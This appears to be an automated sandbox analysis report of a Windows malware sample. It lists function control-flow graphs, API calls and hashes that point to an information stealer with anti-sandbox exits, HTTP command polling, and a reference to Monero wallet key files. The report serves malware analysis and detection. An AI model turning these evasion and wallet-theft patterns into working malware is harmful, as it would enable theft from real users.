                                    control_flow_graph 1033 c36280-c3630b call c4a7a0 call c347b0 call c4a740 InternetOpenA StrCmpCA 1040 c36314-c36318 1033->1040 1041 c3630d 1033->1041 1042 c36509-c36525 call c4a7a0 call c4a800 * 2 1040->1042 1043 c3631e-c36342 InternetConnectA 1040->1043 1041->1040 1062 c36528-c3652d 1042->1062 1045 c36348-c3634c 1043->1045 1046 c364ff-c36503 InternetCloseHandle 1043->1046 1048 c3635a 1045->1048 1049 c3634e-c36358 1045->1049 1046->1042 1050 c36364-c36392 HttpOpenRequestA 1048->1050 1049->1050 1052 c364f5-c364f9 InternetCloseHandle 1050->1052 1053 c36398-c3639c 1050->1053 1052->1046 1055 c363c5-c36405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 c3639e-c363bf InternetSetOptionA 1053->1056 1058 c36407-c36427 call c4a740 call c4a800 * 2 1055->1058 1059 c3642c-c3644b call c48940 1055->1059 1056->1055 1058->1062 1067 c364c9-c364e9 call c4a740 call c4a800 * 2 1059->1067 1068 c3644d-c36454 1059->1068 1067->1062 1071 c364c7-c364ef InternetCloseHandle 1068->1071 1072 c36456-c36480 InternetReadFile 1068->1072 1071->1052 1073 c36482-c36489 1072->1073 1074 c3648b 1072->1074 1073->1074 1078 c3648d-c364c5 call c4a9b0 call c4a8a0 call c4a800 1073->1078 1074->1071 1078->1072
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                      • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                    • StrCmpCA.SHLWAPI(?,019DE580), ref: 00C36303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C36385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C363FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C3646D
                                    • InternetCloseHandle.WININET(00000000), ref: 00C364EF
                                    • InternetCloseHandle.WININET(00000000), ref: 00C364F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00C36503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: e17c6b8eb69b09c6911a61566ea69d84df5a40e244642518d16a8f94a42369bf
                                    • Instruction ID: 04078953bf938df15bcc01f89e04dc2b4793425046c7aa88e5fee91e870fd282
                                    • Opcode Fuzzy Hash: e17c6b8eb69b09c6911a61566ea69d84df5a40e244642518d16a8f94a42369bf
                                    • Instruction Fuzzy Hash: 01717071A50218AFEB24DFA1CC49BEE7778FB44700F1081A8F5096B1D0DBB46A89DF51
                                    Function 00C45510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 c45510-c45577 call c45ad0 call c4a820 * 3 call c4a740 * 4 1106 c4557c-c45583 1090->1106 1107 c45585-c455b6 call c4a820 call c4a7a0 call c31590 call c451f0 1106->1107 1108 c455d7-c4564c call c4a740 * 2 call c31590 call c452c0 call c4a8a0 call c4a800 call c4aad0 StrCmpCA 1106->1108 1124 c455bb-c455d2 call c4a8a0 call c4a800 1107->1124 1134 c45693-c456a9 call c4aad0 StrCmpCA 1108->1134 1138 c4564e-c4568e call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1108->1138 1124->1134 1139 c457dc-c45844 call c4a8a0 call c4a820 * 2 call c31670 call c4a800 * 4 call c46560 call c31550 1134->1139 1140 c456af-c456b6 1134->1140 1138->1134 1269 c45ac3-c45ac6 1139->1269 1142 c456bc-c456c3 1140->1142 1143 c457da-c4585f call c4aad0 StrCmpCA 1140->1143 1147 c456c5-c45719 call c4a820 call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1142->1147 1148 c4571e-c45793 call c4a740 * 2 call c31590 call c452c0 call c4a8a0 call c4a800 call c4aad0 StrCmpCA 1142->1148 1162 c45865-c4586c 1143->1162 1163 c45991-c459f9 call c4a8a0 call c4a820 * 2 call c31670 call c4a800 * 4 call c46560 call c31550 1143->1163 1147->1143 1148->1143 1246 c45795-c457d5 call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1148->1246 1169 c45872-c45879 1162->1169 1170 c4598f-c45a14 call c4aad0 StrCmpCA 1162->1170 1163->1269 1177 c458d3-c45948 call c4a740 * 2 call c31590 call c452c0 call c4a8a0 call c4a800 call c4aad0 StrCmpCA 1169->1177 1178 c4587b-c458ce call c4a820 call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1169->1178 1198 c45a16-c45a21 Sleep 1170->1198 1199 c45a28-c45a91 call c4a8a0 call c4a820 * 2 call c31670 call c4a800 * 4 call c46560 call c31550 1170->1199 1177->1170 1275 c4594a-c4598a call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1177->1275 1178->1170 1198->1106 1199->1269 1246->1143 1275->1170
                                    APIs
                                      • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?,?,00C34F05,00C50DDE), ref: 00C4A82B
                                      • Part of subcall function 00C4A820: lstrcpy.KERNEL32(00C50DDE,00000000), ref: 00C4A885
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C456A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45857
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45228
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45318
                                      • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C4532F
                                      • Part of subcall function 00C452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C45364
                                      • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C45383
                                      • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C453AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C4578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00C45A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 28ca5fe1dee37807d923bde4d3d99bcd04d412a287ff74fd70a68797628a0f84
                                    • Instruction ID: c8a9da924e0a793bb80128a22b504f5d64081eca1e2fb0f7bf29fddeea04b1d2
                                    • Opcode Fuzzy Hash: 28ca5fe1dee37807d923bde4d3d99bcd04d412a287ff74fd70a68797628a0f84
                                    • Instruction Fuzzy Hash: B2E120729501049BEB14FBB1DC96AED7378FF94300F548128B906A61D2EF346B4DEB92
                                    Function 00C417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 c417a0-c417cd call c4aad0 StrCmpCA 1304 c417d7-c417f1 call c4aad0 1301->1304 1305 c417cf-c417d1 ExitProcess 1301->1305 1309 c417f4-c417f8 1304->1309 1310 c419c2-c419cd call c4a800 1309->1310 1311 c417fe-c41811 1309->1311 1313 c41817-c4181a 1311->1313 1314 c4199e-c419bd 1311->1314 1316 c41821-c41830 call c4a820 1313->1316 1317 c418ad-c418be StrCmpCA 1313->1317 1318 c418cf-c418e0 StrCmpCA 1313->1318 1319 c4198f-c41999 call c4a820 1313->1319 1320 c41849-c41858 call c4a820 1313->1320 1321 c41835-c41844 call c4a820 1313->1321 1322 c41970-c41981 StrCmpCA 1313->1322 1323 c418f1-c41902 StrCmpCA 1313->1323 1324 c41951-c41962 StrCmpCA 1313->1324 1325 c41932-c41943 StrCmpCA 1313->1325 1326 c41913-c41924 StrCmpCA 1313->1326 1327 c4185d-c4186e StrCmpCA 1313->1327 1328 c4187f-c41890 StrCmpCA 1313->1328 1314->1309 1316->1314 1348 c418c0-c418c3 1317->1348 1349 c418ca 1317->1349 1350 c418e2-c418e5 1318->1350 1351 c418ec 1318->1351 1319->1314 1320->1314 1321->1314 1338 c41983-c41986 1322->1338 1339 c4198d 1322->1339 1329 c41904-c41907 1323->1329 1330 c4190e 1323->1330 1335 c41964-c41967 1324->1335 1336 c4196e 1324->1336 1333 c41945-c41948 1325->1333 1334 c4194f 1325->1334 1331 c41926-c41929 1326->1331 1332 c41930 1326->1332 1344 c41870-c41873 1327->1344 1345 c4187a 1327->1345 1346 c41892-c4189c 1328->1346 1347 c4189e-c418a1 1328->1347 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1336 1336->1314 1338->1339 1339->1314 1344->1345 1345->1314 1355 c418a8 1346->1355 1347->1355 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00C417C5
                                    • ExitProcess.KERNEL32 ref: 00C417D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: ec49767d3632c52e70e2f5a4dc1759b5ffaaa138cd7743f21682e90a7f9e97bf
                                    • Instruction ID: 79f807f2edb38d479b943eda3385a643f34320c7addf49920a5f08a8241d1153
                                    • Opcode Fuzzy Hash: ec49767d3632c52e70e2f5a4dc1759b5ffaaa138cd7743f21682e90a7f9e97bf
                                    • Instruction Fuzzy Hash: 2F519CB4B1020AEFDB04DFA1D954BBE77B5BF54304F188058E846A7380D770EA85DB62
                                    Function 00C47500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 c47500-c4754a GetWindowsDirectoryA 1357 c47553-c475c7 GetVolumeInformationA call c48d00 * 3 1356->1357 1358 c4754c 1356->1358 1365 c475d8-c475df 1357->1365 1358->1357 1366 c475e1-c475fa call c48d00 1365->1366 1367 c475fc-c47617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 c47628-c47658 wsprintfA call c4a740 1367->1369 1370 c47619-c47626 call c4a740 1367->1370 1377 c4767e-c4768e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C47542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C4760A
                                    • wsprintfA.USER32 ref: 00C47640
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: fd550e18fbedb16aeaef8178e618a040a0714ffa9945cd195727e52e6d8ae253
                                    • Instruction ID: 8864a380c80d597f0689d3954f7338c9ce638ba41ffa57624df576df4a0c8196
                                    • Opcode Fuzzy Hash: fd550e18fbedb16aeaef8178e618a040a0714ffa9945cd195727e52e6d8ae253
                                    • Instruction Fuzzy Hash: A64181B1D04248AFDB10DF94DC45BEEBBB8BF48704F144199F50977280D7786A88CBA5
                                    Function 00C469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D07C8), ref: 00C498A1
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D06D8), ref: 00C498BA
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D07F8), ref: 00C498D2
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0660), ref: 00C498EA
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0750), ref: 00C49903
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D8800), ref: 00C4991B
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019C6920), ref: 00C49933
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019C67E0), ref: 00C4994C
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D05A0), ref: 00C49964
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0828), ref: 00C4997C
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0588), ref: 00C49995
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D07B0), ref: 00C499AD
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019C66A0), ref: 00C499C5
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0720), ref: 00C499DE
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C311D0: ExitProcess.KERNEL32 ref: 00C31211
                                      • Part of subcall function 00C31160: GetSystemInfo.KERNEL32(?), ref: 00C3116A
                                      • Part of subcall function 00C31160: ExitProcess.KERNEL32 ref: 00C3117E
                                      • Part of subcall function 00C31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C3112B
                                      • Part of subcall function 00C31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C31132
                                      • Part of subcall function 00C31110: ExitProcess.KERNEL32 ref: 00C31143
                                      • Part of subcall function 00C31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C3123E
                                      • Part of subcall function 00C31220: __aulldiv.LIBCMT ref: 00C31258
                                      • Part of subcall function 00C31220: __aulldiv.LIBCMT ref: 00C31266
                                      • Part of subcall function 00C31220: ExitProcess.KERNEL32 ref: 00C31294
                                      • Part of subcall function 00C46770: GetUserDefaultLangID.KERNEL32 ref: 00C46774
                                      • Part of subcall function 00C31190: ExitProcess.KERNEL32 ref: 00C311C6
                                      • Part of subcall function 00C47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                      • Part of subcall function 00C47850: RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                      • Part of subcall function 00C47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                      • Part of subcall function 00C478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                      • Part of subcall function 00C478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                      • Part of subcall function 00C478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019D8830,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C46AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00C46AF9
                                    • Sleep.KERNEL32(00001770), ref: 00C46B04
                                    • CloseHandle.KERNEL32(?,00000000,?,019D8830,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46B1A
                                    • ExitProcess.KERNEL32 ref: 00C46B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: aac8c02853ebc8a9d5df6a0ff44d94b94af17a6f516778a63bd82e9f7b9ee537
                                    • Instruction ID: 67eedbd294ded08dfa2f935ab88f88d1ca792c4d6e80b52b3e6855ae854e104b
                                    • Opcode Fuzzy Hash: aac8c02853ebc8a9d5df6a0ff44d94b94af17a6f516778a63bd82e9f7b9ee537
                                    • Instruction Fuzzy Hash: C4312870950208ABEB04FBF1DC56BEE7778BF54301F144528F612A21C2DF706A45EAA6
                                    Function 00C31220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 c31220-c31247 call c489b0 GlobalMemoryStatusEx 1439 c31273-c3127a 1436->1439 1440 c31249-c31271 call c4da00 * 2 1436->1440 1442 c31281-c31285 1439->1442 1440->1442 1444 c31287 1442->1444 1445 c3129a-c3129d 1442->1445 1447 c31292-c31294 ExitProcess 1444->1447 1448 c31289-c31290 1444->1448 1448->1445 1448->1447
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C3123E
                                    • __aulldiv.LIBCMT ref: 00C31258
                                    • __aulldiv.LIBCMT ref: 00C31266
                                    • ExitProcess.KERNEL32 ref: 00C31294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
